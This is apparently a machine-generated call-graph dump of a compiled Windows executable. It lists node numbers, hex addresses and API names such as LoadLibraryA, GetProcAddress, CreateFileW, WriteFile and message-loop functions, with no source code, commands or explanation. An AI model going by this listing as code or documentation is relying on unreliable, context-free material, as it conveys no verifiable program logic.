105728 ce3ee7 91 API calls Mailbox 104623->105728 104625 ce0955 104625->104621 104626 ce0959 GetFullPathNameW 104625->104626 104627 cd7bcc 59 API calls 104626->104627 104628 ce0985 104627->104628 104629 cd7bcc 59 API calls 104628->104629 104630 ce0992 104629->104630 104631 d14cab _wcscat 104630->104631 104632 cd7bcc 59 API calls 104630->104632 104632->104621 104634 d0d261 104633->104634 104635 cd3ab0 LoadImageW RegisterClassExW 104633->104635 105767 cd47a0 LoadImageW EnumResourceNamesW 104634->105767 105766 cd3041 7 API calls 104635->105766 104638 d0d26a 104639 cd3b34 104640 cd39d5 CreateWindowExW CreateWindowExW 
ShowWindow ShowWindow 104639->104640 104640->104494 104642 cd4375 _memset 104641->104642 105768 cd4182 104642->105768 104645 cd43fa 104647 cd4414 Shell_NotifyIconW 104645->104647 104648 cd4430 Shell_NotifyIconW 104645->104648 104649 cd4422 104647->104649 104648->104649 105772 cd407c 104649->105772 104651 cd4429 104651->104496 104653 d14cc3 104652->104653 104664 ce09f5 104652->104664 105850 d39e4a 89 API calls 4 library calls 104653->105850 104655 ce0cfa 104655->104502 104657 ce0ee4 104657->104655 104659 ce0ef1 104657->104659 105848 ce1093 331 API calls Mailbox 104659->105848 104660 ce0a4b PeekMessageW 104719 ce0a05 Mailbox 104660->104719 104662 ce0ef8 LockWindowUpdate DestroyWindow GetMessageW 104662->104655 104666 ce0f2a 104662->104666 104664->104719 105851 cd9e5d 60 API calls 104664->105851 105852 d26349 331 API calls 104664->105852 104665 d14e81 Sleep 104665->104719 104669 d15c58 TranslateMessage DispatchMessageW GetMessageW 104666->104669 104667 ce0ce4 104667->104655 105847 ce1070 10 API calls Mailbox 104667->105847 104669->104669 104670 d15c88 104669->104670 104670->104655 104671 ce0ea5 TranslateMessage DispatchMessageW 104672 ce0e43 PeekMessageW 104671->104672 104672->104719 104673 d14d50 TranslateAcceleratorW 104673->104672 104673->104719 104674 ce0d13 timeGetTime 104674->104719 104675 d1581f WaitForSingleObject 104677 d1583c GetExitCodeProcess CloseHandle 104675->104677 104675->104719 104712 ce0f95 104677->104712 104678 ce0e5f Sleep 104714 ce0e70 Mailbox 104678->104714 104679 cd8047 59 API calls 104679->104719 104680 cd7667 59 API calls 104680->104714 104682 cf0db6 59 API calls Mailbox 104682->104719 104683 d15af8 Sleep 104683->104714 104684 cdb73c 304 API calls 104684->104719 104686 cf049f timeGetTime 104686->104714 104687 ce0f4e timeGetTime 105849 cd9e5d 60 API calls 104687->105849 104690 d15b8f GetExitCodeProcess 104692 d15ba5 WaitForSingleObject 104690->104692 104693 d15bbb CloseHandle 104690->104693 104692->104693 104692->104719 104693->104714 104696 
d55f25 110 API calls 104696->104714 104697 cdb7dd 109 API calls 104697->104714 104698 cd9e5d 60 API calls 104698->104719 104699 d15874 104699->104712 104700 d15c17 Sleep 104700->104719 104701 d15078 Sleep 104701->104719 104703 cd7de1 59 API calls 104703->104714 104707 cd9ea0 304 API calls 104707->104719 104712->104502 104714->104680 104714->104686 104714->104690 104714->104696 104714->104697 104714->104699 104714->104700 104714->104701 104714->104703 104714->104712 104714->104719 105877 d32408 60 API calls 104714->105877 105878 cd9e5d 60 API calls 104714->105878 105879 cd89b3 69 API calls Mailbox 104714->105879 105880 cdb73c 331 API calls 104714->105880 105881 d264da 60 API calls 104714->105881 105882 d35244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104714->105882 105883 d33c55 66 API calls Mailbox 104714->105883 104715 d39e4a 89 API calls 104715->104719 104717 cd9c90 59 API calls Mailbox 104717->104719 104718 cd84c0 69 API calls 104718->104719 104719->104660 104719->104665 104719->104667 104719->104671 104719->104672 104719->104673 104719->104674 104719->104675 104719->104678 104719->104679 104719->104682 104719->104683 104719->104684 104719->104687 104719->104698 104719->104707 104719->104712 104719->104714 104719->104715 104719->104717 104719->104718 104721 d2617e 59 API calls Mailbox 104719->104721 104722 d155d5 VariantClear 104719->104722 104723 cd8cd4 59 API calls Mailbox 104719->104723 104724 d1566b VariantClear 104719->104724 104725 d15419 VariantClear 104719->104725 104726 d26e8f 59 API calls 104719->104726 104727 cd7de1 59 API calls 104719->104727 104728 cd89b3 69 API calls 104719->104728 105795 cde6a0 104719->105795 105826 cdf460 104719->105826 105844 cde420 331 API calls 104719->105844 105845 cdfce0 331 API calls 2 library calls 104719->105845 105846 cd31ce IsDialogMessageW GetClassLongW 104719->105846 105853 d56018 59 API calls 104719->105853 105854 d39a15 59 API calls Mailbox 104719->105854 105855 d2d4f2 59 
API calls 104719->105855 105856 cd9837 104719->105856 105874 d260ef 59 API calls 2 library calls 104719->105874 105875 cd8401 59 API calls 104719->105875 105876 cd82df 59 API calls Mailbox 104719->105876 104721->104719 104722->104719 104723->104719 104724->104719 104725->104719 104726->104719 104727->104719 104728->104719 104729->104504 104730->104481 104731->104491 104733 d0ec6b 104732->104733 104734 cd7b40 104732->104734 106184 d27bdb 59 API calls _memmove 104733->106184 106178 cd7a51 104734->106178 104737 cd7b4c 104737->104516 104738 d0ec75 104739 cd8047 59 API calls 104738->104739 104740 d0ec7d Mailbox 104739->104740 104742 cd3d3e __write_nolock 104741->104742 104743 cd7bcc 59 API calls 104742->104743 104748 cd3ea4 Mailbox 104742->104748 104745 cd3d70 104743->104745 104751 cd3da6 Mailbox 104745->104751 104867 cd79f2 104745->104867 104746 cd3e77 104747 cd7de1 59 API calls 104746->104747 104746->104748 104750 cd3e98 104747->104750 104748->104524 104749 cd7de1 59 API calls 104749->104751 104752 cd3f74 59 API calls 104750->104752 104751->104746 104751->104748 104751->104749 104753 cd3f74 59 API calls 104751->104753 104754 cd79f2 59 API calls 104751->104754 104752->104748 104753->104751 104754->104751 104870 cd4bb5 104755->104870 104760 cd4e08 LoadLibraryExW 104880 cd4b6a 104760->104880 104761 d0d8e6 104763 cd4e4a 84 API calls 104761->104763 104765 d0d8ed 104763->104765 104767 cd4b6a 3 API calls 104765->104767 104769 d0d8f5 104767->104769 104768 cd4e2f 104768->104769 104770 cd4e3b 104768->104770 104906 cd4f0b 104769->104906 104771 cd4e4a 84 API calls 104770->104771 104773 cd37d4 104771->104773 104773->104531 104773->104532 104776 d0d91c 104914 cd4ec7 104776->104914 104778 d0d929 104780 cd37ef 104779->104780 104781 cd8052 104779->104781 104783 cd928a 104780->104783 105165 cd7f77 59 API calls 2 library calls 104781->105165 104784 cf0db6 Mailbox 59 API calls 104783->104784 104785 cd37fb 104784->104785 104785->104545 104787 cd84cb 104786->104787 104789 cd84f2 
104787->104789 105166 cd89b3 69 API calls Mailbox 104787->105166 104789->104549 104791 cd3eda 104790->104791 104792 cd3ef3 104790->104792 104793 cd8047 59 API calls 104791->104793 104794 cd7bcc 59 API calls 104792->104794 104795 cd3879 104793->104795 104794->104795 104796 cf2efd 104795->104796 104797 cf2f7e 104796->104797 104798 cf2f09 104796->104798 105169 cf2f90 60 API calls 3 library calls 104797->105169 104805 cf2f2e 104798->104805 105167 cf8b28 58 API calls __getptd_noexit 104798->105167 104800 cf2f8b 104800->104570 104802 cf2f15 105168 cf8db6 9 API calls wcstoxq 104802->105168 104804 cf2f20 104804->104570 104805->104570 104807 cd92d6 104806->104807 104808 cf0db6 Mailbox 59 API calls 104807->104808 104809 cd92e4 104808->104809 104810 cd3924 104809->104810 105170 cd91fc 59 API calls Mailbox 104809->105170 104812 cd9050 104810->104812 105171 cd9160 104812->105171 104814 cd905f 104815 cf0db6 Mailbox 59 API calls 104814->104815 104816 cd3932 104814->104816 104815->104816 104817 cd8ee0 104816->104817 104818 d0f17c 104817->104818 104820 cd8ef7 104817->104820 104818->104820 105181 cd8bdb 59 API calls Mailbox 104818->105181 104821 cd8ff8 104820->104821 104822 cd9040 104820->104822 104825 cd8fff 104820->104825 104824 cf0db6 Mailbox 59 API calls 104821->104824 105180 cd9d3c 60 API calls Mailbox 104822->105180 104824->104825 104825->104598 104827 cd4ee5 85 API calls 104826->104827 104828 d395ca 104827->104828 105182 d39734 104828->105182 104831 cd4f0b 74 API calls 104832 d395f7 104831->104832 104833 cd4f0b 74 API calls 104832->104833 104834 d39607 104833->104834 104835 cd4f0b 74 API calls 104834->104835 104836 d39622 104835->104836 104837 cd4f0b 74 API calls 104836->104837 104838 d3963d 104837->104838 104839 cd4ee5 85 API calls 104838->104839 104840 d39654 104839->104840 104841 cf571c _W_store_winword 58 API calls 104840->104841 104842 d3965b 104841->104842 104843 cf571c _W_store_winword 58 API calls 104842->104843 104844 d39665 104843->104844 104845 cd4f0b 74 API calls 
104844->104845 104846 d39679 104845->104846 104847 d39109 GetSystemTimeAsFileTime 104846->104847 104848 d3968c 104847->104848 104849 d396a1 104848->104849 104850 d396b6 104848->104850 104851 cf2d55 _free 58 API calls 104849->104851 104852 d3971b 104850->104852 104853 d396bc 104850->104853 104854 d396a7 104851->104854 104856 cf2d55 _free 58 API calls 104852->104856 105188 d38b06 116 API calls __fcloseall 104853->105188 104857 cf2d55 _free 58 API calls 104854->104857 104859 d0d186 104856->104859 104857->104859 104858 d39713 104860 cf2d55 _free 58 API calls 104858->104860 104859->104535 104861 cd4e4a 104859->104861 104860->104859 104862 cd4e5b 104861->104862 104863 cd4e54 104861->104863 104865 cd4e7b FreeLibrary 104862->104865 104866 cd4e6a 104862->104866 105189 cf53a6 104863->105189 104865->104866 104866->104535 104868 cd7e4f 59 API calls 104867->104868 104869 cd79fd 104868->104869 104869->104745 104919 cd4c03 104870->104919 104873 cd4bdc 104875 cd4bec FreeLibrary 104873->104875 104876 cd4bf5 104873->104876 104874 cd4c03 2 API calls 104874->104873 104875->104876 104877 cf525b 104876->104877 104923 cf5270 104877->104923 104879 cd4dfc 104879->104760 104879->104761 105083 cd4c36 104880->105083 104883 cd4c36 2 API calls 104886 cd4b8f 104883->104886 104884 cd4baa 104887 cd4c70 104884->104887 104885 cd4ba1 FreeLibrary 104885->104884 104886->104884 104886->104885 104888 cf0db6 Mailbox 59 API calls 104887->104888 104889 cd4c85 104888->104889 104890 cd522e 59 API calls 104889->104890 104891 cd4c91 _memmove 104890->104891 104893 cd4d89 104891->104893 104894 cd4dc1 104891->104894 104897 cd4ccc 104891->104897 104892 cd4ec7 69 API calls 104903 cd4cd5 104892->104903 105087 cd4e89 CreateStreamOnHGlobal 104893->105087 105098 d3991b 95 API calls 104894->105098 104897->104892 104898 cd4f0b 74 API calls 104898->104903 104900 cd4d69 104900->104768 104901 d0d8a7 104902 cd4ee5 85 API calls 104901->104902 104904 d0d8bb 104902->104904 104903->104898 104903->104900 104903->104901 105093 
cd4ee5 104903->105093 104905 cd4f0b 74 API calls 104904->104905 104905->104900 104907 cd4f1d 104906->104907 104908 d0d9cd 104906->104908 105122 cf55e2 104907->105122 104911 d39109 105142 d38f5f 104911->105142 104913 d3911f 104913->104776 104915 d0d990 104914->104915 104916 cd4ed6 104914->104916 105147 cf5c60 104916->105147 104918 cd4ede 104918->104778 104920 cd4bd0 104919->104920 104921 cd4c0c LoadLibraryA 104919->104921 104920->104873 104920->104874 104921->104920 104922 cd4c1d GetProcAddress 104921->104922 104922->104920 104926 cf527c __tzset_nolock 104923->104926 104924 cf528f 104972 cf8b28 58 API calls __getptd_noexit 104924->104972 104926->104924 104928 cf52c0 104926->104928 104927 cf5294 104973 cf8db6 9 API calls wcstoxq 104927->104973 104942 d004e8 104928->104942 104931 cf52c5 104932 cf52ce 104931->104932 104933 cf52db 104931->104933 104974 cf8b28 58 API calls __getptd_noexit 104932->104974 104935 cf5305 104933->104935 104936 cf52e5 104933->104936 104957 d00607 104935->104957 104975 cf8b28 58 API calls __getptd_noexit 104936->104975 104940 cf529f __tzset_nolock @_EH4_CallFilterFunc@8 104940->104879 104943 d004f4 __tzset_nolock 104942->104943 104944 cf9c0b __lock 58 API calls 104943->104944 104955 d00502 104944->104955 104945 d0057d 104982 cf881d 58 API calls 2 library calls 104945->104982 104946 d00576 104977 d005fe 104946->104977 104949 d00584 104949->104946 104983 cf9e2b InitializeCriticalSectionAndSpinCount 104949->104983 104950 d005f3 __tzset_nolock 104950->104931 104952 cf9c93 __mtinitlocknum 58 API calls 104952->104955 104954 d005aa EnterCriticalSection 104954->104946 104955->104945 104955->104946 104955->104952 104980 cf6c50 59 API calls __lock 104955->104980 104981 cf6cba LeaveCriticalSection LeaveCriticalSection _doexit 104955->104981 104958 d00627 __wopenfile 104957->104958 104959 d00641 104958->104959 104971 d007fc 104958->104971 104990 cf37cb 60 API calls 2 library calls 104958->104990 104988 cf8b28 58 API calls __getptd_noexit 104959->104988 
104961 d00646 104989 cf8db6 9 API calls wcstoxq 104961->104989 104963 d0085f 104985 d085a1 104963->104985 104965 cf5310 104976 cf5332 LeaveCriticalSection LeaveCriticalSection _fseek 104965->104976 104967 d007f5 104967->104971 104991 cf37cb 60 API calls 2 library calls 104967->104991 104969 d00814 104969->104971 104992 cf37cb 60 API calls 2 library calls 104969->104992 104971->104959 104971->104963 104972->104927 104973->104940 104974->104940 104975->104940 104976->104940 104984 cf9d75 LeaveCriticalSection 104977->104984 104979 d00605 104979->104950 104980->104955 104981->104955 104982->104949 104983->104954 104984->104979 104993 d07d85 104985->104993 104987 d085ba 104987->104965 104988->104961 104989->104965 104990->104967 104991->104969 104992->104971 104994 d07d91 __tzset_nolock 104993->104994 104995 d07da7 104994->104995 104998 d07ddd 104994->104998 105080 cf8b28 58 API calls __getptd_noexit 104995->105080 104997 d07dac 105081 cf8db6 9 API calls wcstoxq 104997->105081 105004 d07e4e 104998->105004 105001 d07df9 105082 d07e22 LeaveCriticalSection __unlock_fhandle 105001->105082 105003 d07db6 __tzset_nolock 105003->104987 105005 d07e6e 105004->105005 105006 cf44ea __wsopen_nolock 58 API calls 105005->105006 105010 d07e8a 105006->105010 105007 d07fc1 105008 cf8dc6 __invoke_watson 8 API calls 105007->105008 105009 d085a0 105008->105009 105012 d07d85 __wsopen_helper 103 API calls 105009->105012 105010->105007 105011 d07ec4 105010->105011 105022 d07ee7 105010->105022 105013 cf8af4 __write_nolock 58 API calls 105011->105013 105014 d085ba 105012->105014 105015 d07ec9 105013->105015 105014->105001 105016 cf8b28 wcstoxq 58 API calls 105015->105016 105017 d07ed6 105016->105017 105019 cf8db6 wcstoxq 9 API calls 105017->105019 105018 d07fa5 105020 cf8af4 __write_nolock 58 API calls 105018->105020 105021 d07ee0 105019->105021 105023 d07faa 105020->105023 105021->105001 105022->105018 105026 d07f83 105022->105026 105024 cf8b28 wcstoxq 58 API calls 105023->105024 105025 d07fb7 
105024->105025 105027 cf8db6 wcstoxq 9 API calls 105025->105027 105028 cfd294 __alloc_osfhnd 61 API calls 105026->105028 105027->105007 105029 d08051 105028->105029 105030 d0805b 105029->105030 105031 d0807e 105029->105031 105032 cf8af4 __write_nolock 58 API calls 105030->105032 105033 d07cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105031->105033 105034 d08060 105032->105034 105041 d080a0 105033->105041 105035 cf8b28 wcstoxq 58 API calls 105034->105035 105038 d0806a 105035->105038 105036 d0811e GetFileType 105039 d08129 GetLastError 105036->105039 105040 d0816b 105036->105040 105037 d080ec GetLastError 105042 cf8b07 __dosmaperr 58 API calls 105037->105042 105043 cf8b28 wcstoxq 58 API calls 105038->105043 105044 cf8b07 __dosmaperr 58 API calls 105039->105044 105049 cfd52a __set_osfhnd 59 API calls 105040->105049 105041->105036 105041->105037 105045 d07cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105041->105045 105046 d08111 105042->105046 105043->105021 105047 d08150 CloseHandle 105044->105047 105048 d080e1 105045->105048 105051 cf8b28 wcstoxq 58 API calls 105046->105051 105047->105046 105050 d0815e 105047->105050 105048->105036 105048->105037 105055 d08189 105049->105055 105052 cf8b28 wcstoxq 58 API calls 105050->105052 105051->105007 105053 d08163 105052->105053 105053->105046 105054 d08344 105054->105007 105057 d08517 CloseHandle 105054->105057 105055->105054 105056 d018c1 __lseeki64_nolock 60 API calls 105055->105056 105071 d0820a 105055->105071 105058 d081f3 105056->105058 105059 d07cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 105057->105059 105062 cf8af4 __write_nolock 58 API calls 105058->105062 105077 d08212 105058->105077 105061 d0853e 105059->105061 105060 d00e5b 70 API calls __read_nolock 105060->105077 105063 d08546 GetLastError 105061->105063 105064 d083ce 105061->105064 105062->105071 105065 cf8b07 __dosmaperr 58 API calls 105063->105065 105064->105007 105067 d08552 105065->105067 105066 d00add 
__close_nolock 61 API calls 105066->105077 105068 cfd43d __free_osfhnd 59 API calls 105067->105068 105068->105064 105069 d097a2 __chsize_nolock 82 API calls 105069->105077 105070 cfd886 __write 78 API calls 105070->105071 105071->105054 105071->105070 105073 d018c1 60 API calls __lseeki64_nolock 105071->105073 105071->105077 105072 d083c1 105075 d00add __close_nolock 61 API calls 105072->105075 105073->105071 105074 d083aa 105074->105054 105076 d083c8 105075->105076 105078 cf8b28 wcstoxq 58 API calls 105076->105078 105077->105060 105077->105066 105077->105069 105077->105071 105077->105072 105077->105074 105079 d018c1 60 API calls __lseeki64_nolock 105077->105079 105078->105064 105079->105077 105080->104997 105081->105003 105082->105003 105084 cd4b83 105083->105084 105085 cd4c3f LoadLibraryA 105083->105085 105084->104883 105084->104886 105085->105084 105086 cd4c50 GetProcAddress 105085->105086 105086->105084 105088 cd4ea3 FindResourceExW 105087->105088 105092 cd4ec0 105087->105092 105089 d0d933 LoadResource 105088->105089 105088->105092 105090 d0d948 SizeofResource 105089->105090 105089->105092 105091 d0d95c LockResource 105090->105091 105090->105092 105091->105092 105092->104897 105094 cd4ef4 105093->105094 105095 d0d9ab 105093->105095 105099 cf584d 105094->105099 105097 cd4f02 105097->104903 105098->104897 105101 cf5859 __tzset_nolock 105099->105101 105100 cf586b 105112 cf8b28 58 API calls __getptd_noexit 105100->105112 105101->105100 105103 cf5891 105101->105103 105114 cf6c11 105103->105114 105105 cf5870 105113 cf8db6 9 API calls wcstoxq 105105->105113 105106 cf5897 105120 cf57be 83 API calls 5 library calls 105106->105120 105109 cf58a6 105121 cf58c8 LeaveCriticalSection LeaveCriticalSection _fseek 105109->105121 105111 cf587b __tzset_nolock 105111->105097 105112->105105 105113->105111 105115 cf6c43 EnterCriticalSection 105114->105115 105116 cf6c21 105114->105116 105118 cf6c39 105115->105118 105116->105115 105117 cf6c29 105116->105117 105119 cf9c0b __lock 58 API 
calls 105117->105119 105118->105106 105119->105118 105120->105109 105121->105111 105125 cf55fd 105122->105125 105124 cd4f2e 105124->104911 105126 cf5609 __tzset_nolock 105125->105126 105127 cf561f _memset 105126->105127 105128 cf564c 105126->105128 105129 cf5644 __tzset_nolock 105126->105129 105138 cf8b28 58 API calls __getptd_noexit 105127->105138 105130 cf6c11 __lock_file 59 API calls 105128->105130 105129->105124 105131 cf5652 105130->105131 105140 cf541d 72 API calls 6 library calls 105131->105140 105133 cf5639 105139 cf8db6 9 API calls wcstoxq 105133->105139 105136 cf5668 105141 cf5686 LeaveCriticalSection LeaveCriticalSection _fseek 105136->105141 105138->105133 105139->105129 105140->105136 105141->105129 105145 cf520a GetSystemTimeAsFileTime 105142->105145 105144 d38f6e 105144->104913 105146 cf5238 __aulldiv 105145->105146 105146->105144 105148 cf5c6c __tzset_nolock 105147->105148 105149 cf5c7e 105148->105149 105150 cf5c93 105148->105150 105161 cf8b28 58 API calls __getptd_noexit 105149->105161 105152 cf6c11 __lock_file 59 API calls 105150->105152 105154 cf5c99 105152->105154 105153 cf5c83 105162 cf8db6 9 API calls wcstoxq 105153->105162 105163 cf58d0 67 API calls 6 library calls 105154->105163 105157 cf5ca4 105164 cf5cc4 LeaveCriticalSection LeaveCriticalSection _fseek 105157->105164 105159 cf5cb6 105160 cf5c8e __tzset_nolock 105159->105160 105160->104918 105161->105153 105162->105160 105163->105157 105164->105159 105165->104780 105166->104789 105167->104802 105168->104804 105169->104800 105170->104810 105172 cd9169 Mailbox 105171->105172 105173 d0f19f 105172->105173 105178 cd9173 105172->105178 105174 cf0db6 Mailbox 59 API calls 105173->105174 105175 d0f1ab 105174->105175 105176 cd917a 105176->104814 105178->105176 105179 cd9c90 59 API calls Mailbox 105178->105179 105179->105178 105180->104825 105181->104820 105183 d39748 __tzset_nolock _wcscmp 105182->105183 105184 d395dc 105183->105184 105185 cd4f0b 74 API calls 105183->105185 105186 d39109 
GetSystemTimeAsFileTime 105183->105186 105187 cd4ee5 85 API calls 105183->105187 105184->104831 105184->104859 105185->105183 105186->105183 105187->105183 105188->104858 105190 cf53b2 __tzset_nolock 105189->105190 105191 cf53de 105190->105191 105192 cf53c6 105190->105192 105194 cf6c11 __lock_file 59 API calls 105191->105194 105198 cf53d6 __tzset_nolock 105191->105198 105218 cf8b28 58 API calls __getptd_noexit 105192->105218 105196 cf53f0 105194->105196 105195 cf53cb 105219 cf8db6 9 API calls wcstoxq 105195->105219 105202 cf533a 105196->105202 105198->104862 105203 cf535d 105202->105203 105204 cf5349 105202->105204 105206 cf5359 105203->105206 105221 cf4a3d 105203->105221 105264 cf8b28 58 API calls __getptd_noexit 105204->105264 105220 cf5415 LeaveCriticalSection LeaveCriticalSection _fseek 105206->105220 105207 cf534e 105265 cf8db6 9 API calls wcstoxq 105207->105265 105214 cf5377 105238 d00a02 105214->105238 105216 cf537d 105216->105206 105217 cf2d55 _free 58 API calls 105216->105217 105217->105206 105218->105195 105219->105198 105220->105198 105222 cf4a50 105221->105222 105226 cf4a74 105221->105226 105223 cf46e6 __flsbuf 58 API calls 105222->105223 105222->105226 105224 cf4a6d 105223->105224 105266 cfd886 105224->105266 105227 d00b77 105226->105227 105228 cf5371 105227->105228 105229 d00b84 105227->105229 105231 cf46e6 105228->105231 105229->105228 105230 cf2d55 _free 58 API calls 105229->105230 105230->105228 105232 cf4705 105231->105232 105233 cf46f0 105231->105233 105232->105214 105401 cf8b28 58 API calls __getptd_noexit 105233->105401 105235 cf46f5 105402 cf8db6 9 API calls wcstoxq 105235->105402 105237 cf4700 105237->105214 105239 d00a0e __tzset_nolock 105238->105239 105240 d00a32 105239->105240 105241 d00a1b 105239->105241 105243 d00abd 105240->105243 105244 d00a42 105240->105244 105418 cf8af4 58 API calls __getptd_noexit 105241->105418 105423 cf8af4 58 API calls __getptd_noexit 105243->105423 105247 d00a60 105244->105247 105248 d00a6a 105244->105248 105246 
d00a20 105419 cf8b28 58 API calls __getptd_noexit 105246->105419 105420 cf8af4 58 API calls __getptd_noexit 105247->105420 105252 cfd206 ___lock_fhandle 59 API calls 105248->105252 105249 d00a65 105424 cf8b28 58 API calls __getptd_noexit 105249->105424 105254 d00a70 105252->105254 105256 d00a83 105254->105256 105257 d00a8e 105254->105257 105255 d00ac9 105425 cf8db6 9 API calls wcstoxq 105255->105425 105403 d00add 105256->105403 105421 cf8b28 58 API calls __getptd_noexit 105257->105421 105260 d00a27 __tzset_nolock 105260->105216 105262 d00a89 105422 d00ab5 LeaveCriticalSection __unlock_fhandle 105262->105422 105264->105207 105265->105206 105267 cfd892 __tzset_nolock 105266->105267 105268 cfd89f 105267->105268 105269 cfd8b6 105267->105269 105367 cf8af4 58 API calls __getptd_noexit 105268->105367 105270 cfd955 105269->105270 105272 cfd8ca 105269->105272 105373 cf8af4 58 API calls __getptd_noexit 105270->105373 105275 cfd8e8 105272->105275 105276 cfd8f2 105272->105276 105274 cfd8a4 105368 cf8b28 58 API calls __getptd_noexit 105274->105368 105369 cf8af4 58 API calls __getptd_noexit 105275->105369 105294 cfd206 105276->105294 105277 cfd8ed 105374 cf8b28 58 API calls __getptd_noexit 105277->105374 105281 cfd8ab __tzset_nolock 105281->105226 105282 cfd8f8 105284 cfd91e 105282->105284 105285 cfd90b 105282->105285 105370 cf8b28 58 API calls __getptd_noexit 105284->105370 105303 cfd975 105285->105303 105286 cfd961 105375 cf8db6 9 API calls wcstoxq 105286->105375 105290 cfd917 105372 cfd94d LeaveCriticalSection __unlock_fhandle 105290->105372 105291 cfd923 105371 cf8af4 58 API calls __getptd_noexit 105291->105371 105295 cfd212 __tzset_nolock 105294->105295 105296 cfd261 EnterCriticalSection 105295->105296 105297 cf9c0b __lock 58 API calls 105295->105297 105298 cfd287 __tzset_nolock 105296->105298 105299 cfd237 105297->105299 105298->105282 105300 cfd24f 105299->105300 105376 cf9e2b InitializeCriticalSectionAndSpinCount 105299->105376 105377 cfd28b LeaveCriticalSection _doexit 
105300->105377 105304 cfd982 __write_nolock 105303->105304 105305 cfd9c1 105304->105305 105306 cfd9e0 105304->105306 105338 cfd9b6 105304->105338 105387 cf8af4 58 API calls __getptd_noexit 105305->105387 105311 cfda38 105306->105311 105312 cfda1c 105306->105312 105307 cfc5f6 __cftog_l 6 API calls 105309 cfe1d6 105307->105309 105309->105290 105310 cfd9c6 105388 cf8b28 58 API calls __getptd_noexit 105310->105388 105314 cfda51 105311->105314 105393 d018c1 60 API calls 3 library calls 105311->105393 105390 cf8af4 58 API calls __getptd_noexit 105312->105390 105378 d05c6b 105314->105378 105316 cfda21 105391 cf8b28 58 API calls __getptd_noexit 105316->105391 105317 cfd9cd 105389 cf8db6 9 API calls wcstoxq 105317->105389 105322 cfda5f 105324 cfddb8 105322->105324 105394 cf99ac 58 API calls 2 library calls 105322->105394 105323 cfda28 105392 cf8db6 9 API calls wcstoxq 105323->105392 105325 cfe14b WriteFile 105324->105325 105326 cfddd6 105324->105326 105328 cfddab GetLastError 105325->105328 105340 cfdd78 105325->105340 105329 cfddec 105326->105329 105330 cfdefa 105326->105330 105328->105340 105337 cfde5b WriteFile 105329->105337 105344 cfe184 105329->105344 105333 cfdfef 105330->105333 105334 cfdf05 105330->105334 105332 cfda8b GetConsoleMode 105332->105324 105335 cfdaca 105332->105335 105333->105344 105345 cfe064 WideCharToMultiByte 105333->105345 105334->105344 105347 cfdf6a WriteFile 105334->105347 105335->105324 105336 cfdada GetConsoleCP 105335->105336 105336->105344 105365 cfdb09 105336->105365 105337->105328 105341 cfde98 105337->105341 105338->105307 105340->105338 105343 cfded8 105340->105343 105340->105344 105341->105329 105346 cfdebc 105341->105346 105342 cfe1b2 105400 cf8af4 58 API calls __getptd_noexit 105342->105400 105349 cfe17b 105343->105349 105350 cfdee3 105343->105350 105344->105338 105399 cf8b28 58 API calls __getptd_noexit 105344->105399 105345->105328 105360 cfe0ab 105345->105360 105346->105340 105347->105328 105353 cfdfb9 105347->105353 105398 cf8b07 
58 API calls 3 library calls 105349->105398 105396 cf8b28 58 API calls __getptd_noexit 105350->105396 105353->105334 105353->105340 105353->105346 105354 cfdee8 105397 cf8af4 58 API calls __getptd_noexit 105354->105397 105355 cfe0b3 WriteFile 105358 cfe106 GetLastError 105355->105358 105355->105360 105358->105360 105359 d062ba 60 API calls __write_nolock 105359->105365 105360->105333 105360->105340 105360->105346 105360->105355 105361 d07a5e WriteConsoleW CreateFileW __putwch_nolock 105364 cfdc5f 105361->105364 105362 cfdbf2 WideCharToMultiByte 105362->105340 105363 cfdc2d WriteFile 105362->105363 105363->105328 105363->105364 105364->105328 105364->105340 105364->105361 105364->105365 105366 cfdc87 WriteFile 105364->105366 105365->105340 105365->105359 105365->105362 105365->105364 105395 cf35f5 58 API calls __isleadbyte_l 105365->105395 105366->105328 105366->105364 105367->105274 105368->105281 105369->105277 105370->105291 105371->105290 105372->105281 105373->105277 105374->105286 105375->105281 105376->105300 105377->105296 105379 d05c83 105378->105379 105380 d05c76 105378->105380 105382 d05c8f 105379->105382 105383 cf8b28 wcstoxq 58 API calls 105379->105383 105381 cf8b28 wcstoxq 58 API calls 105380->105381 105384 d05c7b 105381->105384 105382->105322 105385 d05cb0 105383->105385 105384->105322 105386 cf8db6 wcstoxq 9 API calls 105385->105386 105386->105384 105387->105310 105388->105317 105389->105338 105390->105316 105391->105323 105392->105338 105393->105314 105394->105332 105395->105365 105396->105354 105397->105338 105398->105338 105399->105342 105400->105338 105401->105235 105402->105237 105426 cfd4c3 105403->105426 105405 d00b41 105439 cfd43d 59 API calls 2 library calls 105405->105439 105406 d00aeb 105406->105405 105409 cfd4c3 __lseek_nolock 58 API calls 105406->105409 105417 d00b1f 105406->105417 105408 d00b49 105416 d00b6b 105408->105416 105440 cf8b07 58 API calls 3 library calls 105408->105440 105411 d00b16 105409->105411 105410 cfd4c3 __lseek_nolock 
58 API calls 105412 d00b2b CloseHandle 105410->105412 105414 cfd4c3 __lseek_nolock 58 API calls 105411->105414 105412->105405 105415 d00b37 GetLastError 105412->105415 105414->105417 105415->105405 105416->105262 105417->105405 105417->105410 105418->105246 105419->105260 105420->105249 105421->105262 105422->105260 105423->105249 105424->105255 105425->105260 105427 cfd4ce 105426->105427 105428 cfd4e3 105426->105428 105441 cf8af4 58 API calls __getptd_noexit 105427->105441 105434 cfd508 105428->105434 105443 cf8af4 58 API calls __getptd_noexit 105428->105443 105431 cfd4d3 105442 cf8b28 58 API calls __getptd_noexit 105431->105442 105432 cfd512 105444 cf8b28 58 API calls __getptd_noexit 105432->105444 105434->105406 105436 cfd51a 105445 cf8db6 9 API calls wcstoxq 105436->105445 105437 cfd4db 105437->105406 105439->105408 105440->105416 105441->105431 105442->105437 105443->105432 105444->105436 105445->105437 105447 cf079e __write_nolock 105446->105447 105448 cf079f GetLongPathNameW 105447->105448 105449 cd7bcc 59 API calls 105448->105449 105450 cd72bd 105449->105450 105451 cd700b 105450->105451 105452 cd7667 59 API calls 105451->105452 105453 cd701d 105452->105453 105454 cd4750 60 API calls 105453->105454 105455 cd7028 105454->105455 105456 cd7033 105455->105456 105460 d0e885 105455->105460 105458 cd3f74 59 API calls 105456->105458 105459 cd703f 105458->105459 105498 cd34c2 105459->105498 105462 d0e89f 105460->105462 105504 cd7908 61 API calls 105460->105504 105463 cd7052 Mailbox 105463->104614 105465 cd4ddd 136 API calls 105464->105465 